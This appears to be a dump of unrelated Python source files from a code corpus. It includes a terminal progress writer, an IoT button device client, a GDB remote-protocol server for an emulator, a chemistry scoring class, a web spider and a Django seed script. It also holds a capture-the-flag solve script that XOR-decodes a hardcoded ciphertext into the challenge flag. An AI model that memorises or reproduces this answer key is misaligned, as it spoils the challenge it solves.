term = Terminal()
class Writer(object):
"""
---------------------------------------------------------------------------
Create an object with a write method that writes to a
specific place on the screen, defined at instantiation.
This is the glue between blessings and progressbar.
---------------------------------------------------------------------------
"""
def __init__(self, location):
"""
-----------------------------------------------------------------------
Input: location - tuple of ints (x, y), the position
of the bar in the terminal
-----------------------------------------------------------------------
"""
self.location = location
def write(self, string):
with term.location(*self.location):
print(string)
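# Illustrative pairing with the `progressbar2` package, which accepts a
# file-like object via `fd` (an assumption for this sketch; any object
# exposing a write() method should work):
#
#   import progressbar
#   writer = Writer((0, 10))                 # column 0, row 10 of the terminal
#   bar = progressbar.ProgressBar(fd=writer, max_value=100)
#   for i in range(100):
#       bar.update(i + 1)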
| 2.125 | 2 |
{{cookiecutter.project_slug}}/tests/unit/{{cookiecutter.project_slug}}/graphql/resolvers/test_query.py | Maximilien-R/cookiecutter-tartiflette-aiohttp | 3 | 49412 | from unittest.mock import Mock
import pytest
from {{cookiecutter.project_slug}}.graphql.resolvers import resolve_query_hello
@pytest.mark.asyncio
async def test_resolve_query_hello():
result = await resolve_query_hello(
None, {"name": "{{cookiecutter.author_name}}"}, {}, Mock()
)
assert result == "Hello {{cookiecutter.author_name}}!"
| 1.1875 | 1 |
groups/master/ggd/button.py | awslabs/aws-greengrass-mini-fulfillment | 25 | 49540 | #!/usr/bin/env python
# Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not
# use this file except in compliance with the License. A copy of the License is
# located at
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
GGD Button
This GGD will send "green", "red", or "white" button messages.
"""
import os
import json
import time
import socket
import argparse
import datetime
import logging
from gpiozero import PWMLED, Button
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient, DROP_OLDEST
from AWSIoTPythonSDK.core.greengrass.discovery.providers import \
DiscoveryInfoProvider
import utils
from gg_group_setup import GroupConfigFile
dir_path = os.path.dirname(os.path.realpath(__file__))
log = logging.getLogger('button')
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s|%(name)-8s|%(levelname)s: %(message)s')
handler.setFormatter(formatter)
log.addHandler(handler)
log.setLevel(logging.INFO)
GGD_BUTTON_TOPIC = "button"
hostname = socket.gethostname()
green_led = PWMLED(4)
green_button = Button(5)
red_led = PWMLED(17)
red_button = Button(6)
white_led = PWMLED(27)
white_button = Button(13)
mqttc = None
ggd_name = None
def button(sensor_id, toggle):
now = datetime.datetime.now()
if toggle:
val = "on"
else:
val = "off"
msg = {
"version": "2017-07-05", # YYYY-MM-DD
"ggd_id": ggd_name,
"hostname": hostname,
"data": [
{
"sensor_id": sensor_id,
"ts": now.isoformat(),
"value": val
}
]
}
mqttc.publish(GGD_BUTTON_TOPIC, json.dumps(msg), 0)
return msg
def red_push():
msg = button(sensor_id="red-button", toggle=True)
log.info("[red_push] publishing button msg: {0}".format(msg))
red_led.on()
green_led.off()
red_led.pulse()
def red_release():
msg = button(sensor_id="red-button", toggle=False)
log.info("[red_release] publishing button msg: {0}".format(msg))
def green_push():
msg = button(sensor_id="green-button", toggle=True)
log.info("[green_push] publishing button msg: {0}".format(msg))
green_led.on()
red_led.off()
green_led.pulse()
def green_release():
msg = button(sensor_id="green-button", toggle=False)
log.info("[green_release] publishing button msg: {0}".format(msg))
def white_push():
msg = button(sensor_id="white-button", toggle=True)
log.info("[white_push] publishing button msg: {0}".format(msg))
white_led.pulse()
def white_release():
msg = button(sensor_id="white-button", toggle=False)
log.info("[white_release] publishing button msg: {0}".format(msg))
white_led.on()
def use_box(cli):
log.info("[use_box] configuring magic buttons.")
red_button.when_pressed = red_push
red_button.when_released = red_release
green_button.when_pressed = green_push
green_button.when_released = green_release
white_button.when_pressed = white_push
white_button.when_released = white_release
white_led.on()
log.info("[use_box] configured buttons. White LED should now be on.")
try:
while 1:
time.sleep(0.2)
except KeyboardInterrupt:
log.info(
"[use_box] KeyboardInterrupt ... exiting box monitoring loop")
red_led.off()
green_led.off()
white_led.off()
def button_green(cli):
if cli.light:
green_led.on()
msg = button(sensor_id="green-button", toggle=cli.toggle)
print("[cli.button_green] publishing button msg: {0}".format(msg))
def button_red(cli):
if cli.light:
red_led.on()
msg = button(sensor_id="red-button", toggle=cli.toggle)
print("[cli.button_red] publishing button msg: {0}".format(msg))
def button_white(cli):
if cli.light:
white_led.on()
msg = button(sensor_id="white-button", toggle=cli.toggle)
print("[cli.button_white] publishing button msg: {0}".format(msg))
def core_connect(device_name, config_file, root_ca, certificate, private_key,
group_ca_path):
global ggd_name, mqttc
cfg = GroupConfigFile(config_file)
ggd_name = cfg['devices'][device_name]['thing_name']
iot_endpoint = cfg['misc']['iot_endpoint']
dip = DiscoveryInfoProvider()
dip.configureEndpoint(iot_endpoint)
dip.configureCredentials(
caPath=root_ca, certPath=certificate, keyPath=private_key
)
dip.configureTimeout(10) # 10 sec
logging.info("[button] Discovery using CA:{0} cert:{1} prv_key:{2}".format(
root_ca, certificate, private_key
))
gg_core, discovery_info = utils.discover_configured_core(
device_name=device_name, dip=dip, config_file=config_file,
)
if not gg_core:
raise EnvironmentError("[button] Couldn't find the Core")
ca_list = discovery_info.getAllCas()
group_id, ca = ca_list[0]
group_ca_file = utils.save_group_ca(ca, group_ca_path, group_id)
mqttc = AWSIoTMQTTClient(ggd_name)
# local Greengrass Core discovered, now connect to Core from this Device
log.info("[button] gca_file:{0} cert:{1}".format(
group_ca_file, certificate))
mqttc.configureCredentials(group_ca_file, private_key, certificate)
mqttc.configureOfflinePublishQueueing(10, DROP_OLDEST)
return mqttc, gg_core
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Mini Fulfillment GGD and CLI button',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('device_name',
help="The GGD device_name in the config file.")
parser.add_argument('config_file',
help="The config file.")
parser.add_argument('root_ca',
help="Root CA File Path of Cloud Server Certificate.")
parser.add_argument('certificate',
help="File Path of GGD Certificate.")
parser.add_argument('private_key',
help="File Path of GGD Private Key.")
parser.add_argument('group_ca_path',
help="The directory path where the discovered Group CA "
"will be saved.")
subparsers = parser.add_subparsers()
box_parser = subparsers.add_parser(
'box', description='Use the physical button box to drive.')
box_parser.add_argument('--on', action='store_true',
help="Toggle box ON")
box_parser.set_defaults(func=use_box, on=True)
green_parser = subparsers.add_parser(
'green',
description='Virtual GREEN button pushed')
green_parser.add_argument('--on', dest='toggle', action='store_true',
help="Virtual toggle ON")
green_parser.add_argument('--off', dest='toggle', action='store_false',
help="Virtual toggle OFF")
green_parser.add_argument('--light', action='store_true')
green_parser.set_defaults(func=button_green, toggle=True)
red_parser = subparsers.add_parser(
'red',
description='Virtual RED button pushed')
red_parser.add_argument('--on', dest='toggle', action='store_true',
help="Virtual toggle ON")
red_parser.add_argument('--off', dest='toggle', action='store_false',
help="Virtual toggle OFF")
red_parser.add_argument('--light', action='store_true')
red_parser.set_defaults(func=button_red, toggle=True)
white_parser = subparsers.add_parser(
'white',
description='Virtual WHITE button toggled')
white_parser.add_argument('--on', dest='toggle', action='store_true',
help="Virtual toggle ON")
white_parser.add_argument('--off', dest='toggle', action='store_false',
help="Virtual toggle OFF")
white_parser.add_argument('--light', action='store_true')
white_parser.set_defaults(func=button_white, toggle=True)
pa = parser.parse_args()
client, core = core_connect(
device_name=pa.device_name,
config_file=pa.config_file, root_ca=pa.root_ca,
certificate=pa.certificate, private_key=pa.private_key,
group_ca_path=pa.group_ca_path
)
if utils.mqtt_connect(mqtt_client=client, core_info=core):
pa.func(pa)
time.sleep(0.5)
mqttc.disconnect()
time.sleep(1)
| 1.46875 | 1 |
megastone/rsp/server.py | giltom/megastone | 2 | 49668 | from megastone.util import round_up
import threading
import logging
import io
import enum
import dataclasses
import abc
from megastone.errors import UnsupportedError
from megastone.mem import SegmentMemory, MemoryAccessError
from megastone.debug import Debugger, StopReason, StopType, HookType, CPUError, InvalidInsnError, MemFaultError
from .connection import RSPConnection, Signal, parse_ascii, parse_hex_int, parse_hexint_list, parse_list, encode_hex, parse_hex, ParsingError
from .stream import EndOfStreamError, TCPStreamServer
from .target import load_gdb_regs
logger = logging.getLogger(__name__)
STOP_POLL_TIME = 0.25
HOOK_TYPE_TO_STOP_REASON = {
HookType.CODE: 'hwbreak',
HookType.WRITE: 'watch',
HookType.READ: 'rwatch',
HookType.ACCESS: 'awatch'
}
ERROR_RESPONSE = b'E01'
OK_RESPONSE = b'OK'
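# GDB 'Z'/'z' packet type codes (per the GDB remote serial protocol): 0 = software
# breakpoint, 1 = hardware breakpoint, 2 = write watchpoint, 3 = read watchpoint,
# 4 = access watchpoint. Both breakpoint flavours are mapped onto HookType.CODE here.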
GDB_TYPE_TO_HOOK_TYPE = {
0: HookType.CODE,
1: HookType.CODE,
2: HookType.WRITE,
3: HookType.READ,
4: HookType.ACCESS
}
class ServerStopReason(enum.Enum):
STOPPED = enum.auto()
KILLED = enum.auto()
DETACHED = enum.auto()
@dataclasses.dataclass
class _MonitorCommand(abc.ABC):
name: str
handler: callable
help: str
class GDBServer:
"""GDB Server implementation. Exposes a Debugger to external GDB clients."""
def __init__(self, dbg: Debugger, port=1234, host='localhost'):
if not dbg.arch.gdb_supported:
raise UnsupportedError('Architecture doesn\'t support GDB')
self.dbg = dbg
self.stop_reason: ServerStopReason = None
self._regs = load_gdb_regs(dbg.arch)
self._server = TCPStreamServer(host, port)
self._stopped = threading.Event()
self._listening = threading.Event()
self._cmd_stop_reason: ServerStopReason = None
self._cpu_stop_reason: StopReason = None
self._stop_exception: CPUError = None
self._hooks = {} #HookType => address => Hook
self._handlers = {
b'?': self._handle_stop_reason,
b'D': self._handle_detach,
b'k': self._handle_kill,
b'qAttached': self._handle_attached,
b'qSupported': self._handle_supported,
b'qXfer:features:read:target.xml:': self._handle_read_features,
b'qXfer:memory-map:read::': self._handle_read_memory_map,
b'g': self._handle_read_regs,
b'G': self._handle_write_regs,
b'm': self._handle_read_mem,
b'M': self._handle_write_mem,
b's': self._handle_step,
b'c': self._handle_continue,
b'S': self._handle_step_signal,
b'C': self._handle_continue_signal,
b'Z': self._handle_add_breakpoint,
b'z': self._handle_remove_breakpoint,
b'qRcmd,' : self._handle_monitor_command
}
self._monitor_commands = [
_MonitorCommand('help', self._handle_help, 'Print a list of monitor commands.'),
_MonitorCommand('megastone', self._handle_megastone, 'Check whether the server is a Megastone server.'),
_MonitorCommand('segments', self._handle_segments, 'Print the list of Segments.'),
_MonitorCommand('info', self._handle_info, 'Print information about the Megastone configuration.'),
_MonitorCommand('error', self._handle_error, 'Print information about the last CPU error.'),
_MonitorCommand('endian', self._handle_endian, 'Print the endian of the server.')
]
    def run(self, *, persistent=False):
        """Run the server. Blocks until the client exits or an error occurs."""
self._stopped.clear()
self._server.initialize()
self._listening.set()
with self._server:
self._server.set_timeout(STOP_POLL_TIME)
while True:
reason = self._run_once()
if reason is ServerStopReason.STOPPED or reason is ServerStopReason.KILLED or not persistent:
self.stop_reason = reason
break
self._listening.clear()
def stop(self):
"""
Stop the server.
This can be safely called from a different thread than the one running the server.
"""
self._stopped.set()
def _run_once(self):
conn = self._wait_for_connection()
if conn is None:
return ServerStopReason.STOPPED
with conn:
return self._main_loop(conn)
def _wait_for_connection(self):
logger.info('waiting for client connection')
while True:
try:
stream = self._server.get_stream()
except TimeoutError:
if self._check_stopped():
return None
else:
return RSPConnection(stream)
def _main_loop(self, conn: RSPConnection):
self._cmd_stop_reason = None
while True:
try:
command = conn.receive_packet(timeout=STOP_POLL_TIME)
except EndOfStreamError:
logger.warning('client disconnected')
return ServerStopReason.DETACHED
if self._check_stopped():
return ServerStopReason.STOPPED
if command is None:
continue
logger.debug(f'received packet: {command}')
response = self._handle_command(command)
if response is not None:
logger.debug(f'sending response: {response}')
conn.send_packet(response)
if self._cmd_stop_reason is not None:
return self._cmd_stop_reason
def _handle_command(self, command):
for prefix, handler in self._handlers.items():
if command.startswith(prefix):
args = command[len(prefix):]
return handler(args)
return b''
def _check_stopped(self):
if self._stopped.is_set():
logger.info('server stopped by thread')
return True
return False
def _handle_stop_reason(self, args):
return self._get_stop_response()
def _handle_detach(self, args):
logger.info('client detached')
self._cmd_stop_reason = ServerStopReason.DETACHED
return b'OK'
def _handle_kill(self, args):
logger.info('killed by client')
self._cmd_stop_reason = ServerStopReason.KILLED
return None
def _handle_attached(self, args):
return b'1'
def _handle_read_regs(self, args):
return self._encode_regs()
def _handle_write_regs(self, args):
self._parse_regs(args)
return OK_RESPONSE
def _handle_read_mem(self, args):
address, size = parse_hexint_list(args, 2)
try:
data = self.dbg.mem.read(address, size)
except MemoryAccessError as e:
logger.error(str(e))
return ERROR_RESPONSE
return encode_hex(data)
def _handle_write_mem(self, args):
addresses, hex_data = parse_list(args, 2, b':')
address, _ = parse_hexint_list(addresses, 2)
data = parse_hex(hex_data)
logger.info(f'Write memory: 0x{address:X} +0x{len(data):X}')
try:
self.dbg.mem.write(address, data)
except MemoryAccessError as e:
logger.error(str(e))
return ERROR_RESPONSE
return OK_RESPONSE
def _handle_continue(self, args):
return self._handle_run(args, None)
def _handle_step(self, args):
return self._handle_run(args, 1)
def _handle_add_breakpoint(self, args):
type, address, size = self._parse_hook(args)
logger.debug(f'adding hook: {type} 0x{address:X} +0x{size:X}')
hook = self.dbg.add_breakpoint(address, size, type)
self._add_hook(hook)
return OK_RESPONSE
def _handle_remove_breakpoint(self, args):
type, address, _ = self._parse_hook(args)
logger.debug(f'remove hook: {type} 0x{address:X}')
hook = self._pop_hook(type, address)
self.dbg.remove_hook(hook)
return OK_RESPONSE
def _handle_continue_signal(self, args):
return self._handle_run_signal(args, None)
def _handle_step_signal(self, args):
return self._handle_run_signal(args, 1)
def _handle_run_signal(self, args, count):
_, _, address = args.partition(b';')
return self._handle_run(address, count)
def _handle_run(self, args, count):
if len(args) == 0:
address = None
else:
address = parse_hex_int(args)
self._cpu_stop_reason = None
self._stop_exception = None
logger.debug(f'run: address={address}, count={count}')
try:
self._cpu_stop_reason = self.dbg.run(count=count, address=address)
except CPUError as e:
self._stop_exception = e
logger.info(f'stopped: {e}')
else:
logger.debug(f'stopped: {self._cpu_stop_reason.type.name}')
return self._get_stop_response()
def _handle_supported(self, args):
return b'swbreak+;hwbreak+;qXfer:features:read+;qXfer:memory-map:read+;multiprocess-'
def _handle_read_features(self, args):
features = f'<target version="1.0"><architecture>{self.dbg.arch.gdb_name}</architecture></target>'
file = io.BytesIO(features.encode())
return self._handle_xfer(file, args)
def _handle_read_memory_map(self, args):
file = io.BytesIO()
if isinstance(self.dbg.mem, SegmentMemory):
self._build_memory_map(file)
return self._handle_xfer(file, args)
def _build_memory_map(self, fileobj):
assert isinstance(self.dbg.mem, SegmentMemory)
fileobj.write(b'<memory-map>')
for segment in self.dbg.mem.segments:
fileobj.write(f'<memory type="ram" start="0x{segment.address:x}" length="0x{segment.size:x}"/>'.encode())
fileobj.write(b'</memory-map>')
def _handle_xfer(self, fileobj, args):
offset, length = parse_hexint_list(args, 2)
fileobj.seek(offset)
data = fileobj.read(length)
if len(data) < length:
return b'l' + data
return b'm' + data
def _add_hook(self, hook):
address_hooks = self._hooks.setdefault(hook.type, {})
address_hooks[hook.address] = hook
def _pop_hook(self, type, address):
if type not in self._hooks or address not in self._hooks[type]:
raise ParsingError(f'Hook of type {type} does not exist at 0x{address:X}')
return self._hooks[type].pop(address)
def _parse_hook(self, args):
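        # args arrive as b'<type>,<addr>,<kind>' from a Z/z packet, e.g. b'0,400123,4'
        # (illustrative values) for a software breakpoint at 0x400123 with kind/size 4.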
type, address, size = parse_hexint_list(args, 3)
htype = GDB_TYPE_TO_HOOK_TYPE.get(type)
if htype is None:
raise ParsingError(f'Invalid hook type {type}')
if size == 0:
size = 1
return htype, address, size
def _get_stop_response(self):
info = ''
if self._stop_exception is None:
signum = Signal.SIGTRAP
if self._cpu_stop_reason is not None:
info = self._get_stop_info(self._cpu_stop_reason)
elif isinstance(self._stop_exception, MemFaultError):
signum = Signal.SIGSEGV
elif isinstance(self._stop_exception, InvalidInsnError):
signum = Signal.SIGILL
else:
signum = Signal.SIGABRT
return f'T{signum.value:02X}{info}'.encode()
def _get_stop_info(self, reason: StopReason):
if reason.type is not StopType.HOOK:
return ''
hook = reason.hook
key = HOOK_TYPE_TO_STOP_REASON.get(hook.type)
if key is None:
return ''
if hook.type.is_data:
value = f'{hook.address:X}'
else:
value = ''
return f'{key}:{value};'
def _encode_reg(self, gdb_reg):
if gdb_reg.is_dummy:
value = 0
else:
value = self.dbg.regs[gdb_reg.name]
return self.dbg.arch.endian.encode_int(value, gdb_reg.size)
def _parse_reg(self, data):
return self.dbg.arch.endian.decode_int(data)
def _encode_regs(self):
reg_data = b''.join(self._encode_reg(reg) for reg in self._regs)
return encode_hex(reg_data)
def _parse_regs(self, data):
stream = io.BytesIO(parse_hex(data))
for reg in self._regs:
reg_data = stream.read(reg.size)
if len(reg_data) < reg.size:
raise ParsingError('Received register packet is too short')
if reg.is_dummy:
continue
value = self._parse_reg(reg_data)
if value != self.dbg.regs[reg.name]:
logger.debug(f'Setting register {reg.name} to 0x{value:X}')
self.dbg.regs[reg.name] = value
def _handle_monitor_command(self, args):
cmd = parse_ascii(parse_hex(args))
response = self._handle_monitor_command_string(cmd) + '\n'
return encode_hex(response.encode())
def _handle_monitor_command_string(self, s):
if s == '':
s = 'help'
commands = [cmd for cmd in self._monitor_commands if cmd.name.startswith(s)]
if len(commands) == 0:
return f'Unknown monitor command {s}. Type "monitor help" for a list of commands.'
elif len(commands) > 1:
names = ', '.join(cmd.name for cmd in commands)
return f'Ambiguous monitor command {s}: could be {names}.'
else:
logger.debug(f'monitor command: {commands[0].name}')
return commands[0].handler()
def _handle_help(self):
lines = ['Megastone monitor commands:']
for command in self._monitor_commands:
lines.append(f'{command.name} - {command.help}')
return '\n'.join(lines)
def _handle_megastone(self):
return 'true'
def _handle_segments(self):
if not isinstance(self.dbg.mem, SegmentMemory):
return 'Current Memory doesn\'t support segments.'
segs = sorted(self.dbg.mem.segments, key=lambda s: s.start)
if len(segs) == 0:
return 'No segments information is available.'
addr_width = _get_field_width((seg.address for seg in segs), 'Address')
size_width = _get_field_width((seg.size for seg in segs), 'Size')
lines = [f'{"Address":{addr_width}} {"Size":{size_width}} Perms Name']
for seg in segs:
lines.append(f'{seg.address:#{addr_width}x} {seg.size:#{size_width}x} {seg.perms:<5} {seg.name}')
return '\n'.join(lines)
def _handle_info(self):
return (
f'Architecture: {self.dbg.arch.name}\n'
f'InstructionSet: {self.dbg.isa.name}\n'
f'Endian: {self.dbg.arch.endian.name.lower()}\n'
f'Debugger class: {self.dbg.__class__.__name__}\n'
f'Memory class: {self.dbg.mem.__class__.__name__}\n'
f'Server address: {self._server.host}:{self._server.port}'
)
def _handle_error(self):
if self._stop_exception is None:
return 'No CPU error occurred.'
return str(self._stop_exception)
def _handle_endian(self):
return self.dbg.arch.endian.name
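    # Illustrative usage (not part of the original module; `dbg` is an assumed,
    # already-constructed megastone Debugger):
    #   server = GDBServer(dbg, port=1234)
    #   server.run(persistent=True)  # a stock gdb can then attach via: target remote localhost:1234
    # run() blocks until the client kills/detaches or stop() is called from another thread.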
def _get_field_width(values, title):
max_value = max(values)
max_size = round_up(max_value.bit_length(), 4) // 4
return max(len(title), max_size + 2) | 1.585938 | 2 |
scoring/clogp.py | MauriceKarrenbrock/reinvent-memory | 0 | 49796 | <gh_stars>0
# coding=utf-8
from typing import List
import numpy as np
from rdkit import Chem
from rdkit.Chem import rdMolDescriptors
class clogp(object):
    """ Optimize structures to have a predicted clogP within a particular range"""
def __init__(self, range: str):
try:
numbers = list(map(float, range.split("-")))
except:
raise ValueError("clogp needs to be a valid float number or a valid range like: 2.0-3.0")
if len(numbers) == 1:
            self.clogp = (numbers[0], numbers[0])
else:
self.clogp = (numbers[0], numbers[1])
def __call__(self, smiles: List[str]) -> dict:
mols = [Chem.MolFromSmiles(smile) for smile in smiles]
valid = [1 if mol is not None else 0 for mol in mols]
valid_idxs = [idx for idx, boolean in enumerate(valid) if boolean == 1]
valid_mols = [mols[idx] for idx in valid_idxs]
clogp = [ self.calcLogP(mol) for mol in valid_mols ]
logp_score = [self.score_clogp(ele) for ele in clogp]
score = np.full(len(smiles), 0, dtype=np.float32)
for idx, value in zip(valid_idxs, logp_score):
score[idx] = value
#return {"total_score": np.array(score, dtype=np.float32), "clogp": clogp}
return {"total_score": np.array(score, dtype=np.float32)}
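    # Illustrative usage (not in the original module; assumes RDKit is installed):
    #   scorer = clogp("2.0-3.0")
    #   scorer(["CCO", "c1ccccc1"])  # -> {"total_score": np.array([...], dtype=np.float32)}
    # Molecules whose Crippen clogP lies inside the range score 1.0; scores decay via
    # tanh of the distance outside it, and invalid SMILES score 0.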
def calcLogP(self, mol):
try:
return rdMolDescriptors.CalcCrippenDescriptors(mol)[0]
except:
return None
def score_clogp(self, clogp):
if clogp is None:
return 0
else:
if clogp < self.clogp[0]:
min_distance = abs(self.clogp[0] - clogp)
else: #greater equal than lower bound
if clogp <= self.clogp[1]: #right in the boundary
return 1
else:
distance_to_lower_bound = abs(self.clogp[0] - clogp)
distance_to_upper_bound = abs(self.clogp[1] - clogp)
min_distance = min(distance_to_lower_bound, distance_to_upper_bound)
            # transform the distance to a score between 0 and 1
return 1 - np.tanh(min_distance) | 2.453125 | 2 |
facet/network/__init__.py | edponce/FACET | 2 | 49924 | from .client import SocketClient
from .server import (
SocketServer,
SocketServerHandler,
)
| 0.384766 | 0 |
rev/rev-verybabyrev/solve.py | NoXLaw/RaRCTF2021-Challenges-Public | 2 | 50052 | af = list(b"\x13\x13\x11\x17\x12\x1d\x48\x45\x45\x41\x0b\x26\x2c\x42\x5f\x09\x0b\x5f\x6c\x3d\x56\x56\x1b\x54\x5f\x41\x45\x29\x3c\x0b\x5c\x58\x00\x5f\x5d\x09\x54\x6c\x2a\x40\x06\x06\x6a\x27\x48\x42\x5f\x4b\x56\x42\x2d\x2c\x43\x5d\x5e\x6c\x2d\x41\x07\x47\x43\x5e\x31\x6b\x5a\x0a\x3b\x6e\x1c\x49\x54\x5e\x1a\x2b\x34\x05\x5e\x47\x28\x28\x1f\x11\x26\x3b\x07\x50\x04\x06\x04\x0d\x0b\x05\x03\x48\x77\x0a")
flag = "r"
char = "r"
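# Rolling XOR decode: each recovered character is the previous plaintext character
# XORed with the next ciphertext byte, with the stream seeded by 'r'.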
for stuff in af:
flag += chr(ord(char) ^ stuff)
char = flag[-1]
print(flag)
| 1.085938 | 1 |
CBCS_Tickets/apps.py | tjdolan121/tickets | 1 | 50180 | <gh_stars>1-10
from django.apps import AppConfig
class CbcsTicketsConfig(AppConfig):
name = 'CBCS_Tickets'
| 0.53125 | 1 |
releaseherald/releaseherald/plugins/hookspecs.py | Morgan-Stanley/Testplan | 0 | 50308 | <gh_stars>0
from typing import List, Dict, Any
import pluggy
from git import Repo, Tag
from releaseherald.configuration import Configuration
from releaseherald.plugins import CommitInfo
from releaseherald.plugins.interface import (
MutableProxy,
VersionNews,
News,
Output,
CommandOptions,
)
hookspec = pluggy.HookspecMarker("releaseherald")
@hookspec
def process_config(config: Configuration):
"""
    Called as the first callback to the plugin. It can use this to
    initialize itself based on the configuration read from the config file.
    It also has a chance to change the configuration: it can, for example,
    parse and validate its own sub-configuration and replace the dict in `config`
with a more manageable object.
Args:
config: The configuration
"""
pass
@hookspec
def get_command_options(command: str) -> CommandOptions:
"""
    This callback gives a plugin the chance to add command-line options to the
    various cli commands. It is called with the name of the command.
    Args:
        command: the name of the cli command the options are being collected for
Returns:
collection of `click.Options` that are added to the cli command
and a callable that can set the configured value as the default for the
cli option"""
pass
@hookspec
def on_start_command(command: str, kwargs: Dict[str, Any]):
"""
Called before a cli command start to execute.
Args:
command: the name of the command
kwargs: the parameters the command called with
"""
pass
@hookspec
def process_tags(repo: Repo, tags: List[Tag]):
"""
Args:
repo: the git repository
tags:
            List of tags releaseherald considers as the versions for which
            it needs to collect newsfragments. The plugin is free
            to manipulate the list of tags; complex filtering can be
            implemented here.
"""
pass
@hookspec
def process_commits(repo: Repo, tags: List[Tag], commits: List[CommitInfo]):
"""
The aim of this hook is to collect the list of commits based on the tags.
The plugin supposed to modify the `commits` list. The default plugin, just
turns the tags into [CommitInfo][releaseherald.plugins.interface.CommitInfo].
Args:
repo: the git repository
tags: the tags collected by [process_tags][releaseherald.plugins.hookspecs.process_tags]
commits: Info about each commits
"""
pass
@hookspec
def get_news_between_commits(
repo: Repo,
commit_from: CommitInfo,
commit_to: CommitInfo,
news: List[News],
):
"""
In this hook the plugin can alter the collected `news` between the two commits. It is
    called for every pair of consecutive commits processed by
[process_commits][releaseherald.plugins.hookspecs.process_commits].
Args:
repo: the git repository
commit_from: The earlier commit
commit_to: The later commit
news: The list of news that previous plugins collected, can be altered by the plugin
"""
pass
@hookspec
def get_version_news(
repo: Repo,
commit_from: CommitInfo,
commit_to: CommitInfo,
news: List[News],
version_news: MutableProxy[VersionNews],
):
"""
    In this hook plugins can produce a wrapper around the list of news that represents a
    version in releaseherald's data structure. Called for every pair of consecutive commits processed by
[process_commits][releaseherald.plugins.hookspecs.process_commits] with the news processed by
[get_news_between_commits][releaseherald.plugins.hookspecs.get_news_between_commits] for the
same two commits.
Args:
repo: the git repository
commit_from: The earlier commit
commit_to: The later commit
news: The list of news collected by
[get_news_between_commits][releaseherald.plugins.hookspecs.get_news_between_commits]
version_news: The version news representing a version with the changes between two commits
"""
pass
@hookspec
def process_version_news(version_news: List[VersionNews]):
"""
    This hook gives the plugin a chance to alter the list of versions.
Args:
version_news: All the version/news collected so far
"""
pass
@hookspec
def generate_output(
version_news: List[VersionNews], output: MutableProxy[Output]
):
"""
    The plugin can generate an output in memory in any format it wants. It also has a
    chance to alter or replace an output generated by any previous plugin.
Args:
version_news:
All the version/news collected and processed by
[process_version_news][releaseherald.plugins.hookspecs.process_version_news]
output: Output in plugin specific format
"""
pass
@hookspec
def write_output(output: Output):
"""
    The plugin should do its final output step here: write to a file or to stdout, send a mail,
    upload to some service, or do whatever else is desired.
Args:
output: the output from [generate_output][releaseherald.plugins.hookspecs.generate_output]
"""
pass
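# Illustrative sketch (not part of this module): a minimal plugin implementing one of the
# hooks specified above. The hookimpl marker shown here is an assumption; pluggy's
# HookimplMarker must use the same "releaseherald" project name as the hookspec marker.
#
#   import pluggy
#   hookimpl = pluggy.HookimplMarker("releaseherald")
#
#   class OnlyVersionTags:
#       @hookimpl
#       def process_tags(self, repo, tags):
#           # keep only tags that look like version tags
#           tags[:] = [tag for tag in tags if tag.name.startswith("v")]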
| 1.867188 | 2 |
spiders/a505.py | senlyu163/crawler | 0 | 50436 | <reponame>senlyu163/crawler<filename>spiders/a505.py
# -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from ..utils import extract_CN_from_content
from ..items import ScrapySpiderItem
import re
class A505Spider(CrawlSpider):
name = '505'
allowed_domains = ['xxgk.gangu.gov.cn']
start_urls = ['http://xxgk.gangu.gov.cn/']
rules = (
Rule(LinkExtractor(allow=r'/index\.php\?m=content&c=index&a=lists&catid=\d+'), follow=True),
Rule(LinkExtractor(allow=r'/index\.php\?m=content&c=index&a=show&catid=\d+&id=\d+'), callback='parse_item', follow=True),
Rule(LinkExtractor(allow=r'index\.php\?m=content&c=index&a=lists&catid=\d+&page=\d+'), follow=True),
# Rule(LinkExtractor(allow=r'Items/'), callback='parse_item', follow=True),
)
def parse_item(self, response):
item = ScrapySpiderItem()
item['url'] = response.url
date = response.xpath('/html/body/table/tr/td/table[5]/tr/td/table[2]/tr/td/span').extract_first()
date = re.search(r"(\d{4}-\d{2}-\d{2})", date).groups()[0]
item['date'] = date
title = response.xpath('/html/body/table/tr/td/table[5]/tr/td/table[1]/tr/td/span/text()').extract_first()
item['title'] = title
contents = response.xpath('/html/body/table/tr/td/table[5]/tr/td/table[5]/tr').extract()
item['contents'] = extract_CN_from_content(contents)
return item
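    # Illustrative: run from inside the enclosing Scrapy project with `scrapy crawl 505`.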
| 1.773438 | 2 |
app/scripts/populate_db.py | spiros-m2/books-rest-api | 0 | 50564 | <gh_stars>0
from django.db import transaction
#
from books import models
from datetime import datetime
@transaction.atomic
def populate_authors():
print("Adding authors...")
authors = [
models.Author(
id=1,
first_name="Kurt",
last_name="Vonnegut",
birthday=datetime(1922, 11, 11),
email="<EMAIL>"
),
models.Author(
id=2,
first_name="Ray",
last_name="Bradbury",
birthday=datetime(1920, 8, 22),
email="<EMAIL>"
),
models.Author(
id=3,
first_name="Isaac",
last_name="Asimov",
birthday=datetime(1920, 1, 2),
email="<EMAIL>"
),
models.Author(
id=4,
first_name="<NAME>.",
last_name="Dick",
birthday=datetime(1928, 12, 16),
email="<EMAIL>"
),
models.Author(
id=5,
first_name="George",
last_name="Orwell",
birthday=datetime(1903, 6, 25),
email="<EMAIL>"
)
]
models.Author.objects.bulk_create(authors)
@transaction.atomic
def populate_publishers():
print("Adding publishers...")
publishers = [
models.Publisher(
id=1,
name="HarperCollins Publishers",
address="London, United Kingdom",
),
models.Publisher(
id=2,
name="Random House USA Inc",
address="New York, United States",
),
models.Publisher(
id=3,
name="Bantam Doubleday Dell Publishing Group Inc",
address="New York, United States"
),
models.Publisher(
id=4,
name="Orion Publishing Co",
address="London, United Kingdom",
),
models.Publisher(
id=5,
name="Penguin Books Ltd",
address="London, United Kingdom",
),
models.Publisher(
id=6,
name="Vintage Publishing",
address="London, United Kingdom",
)
]
models.Publisher.objects.bulk_create(publishers)
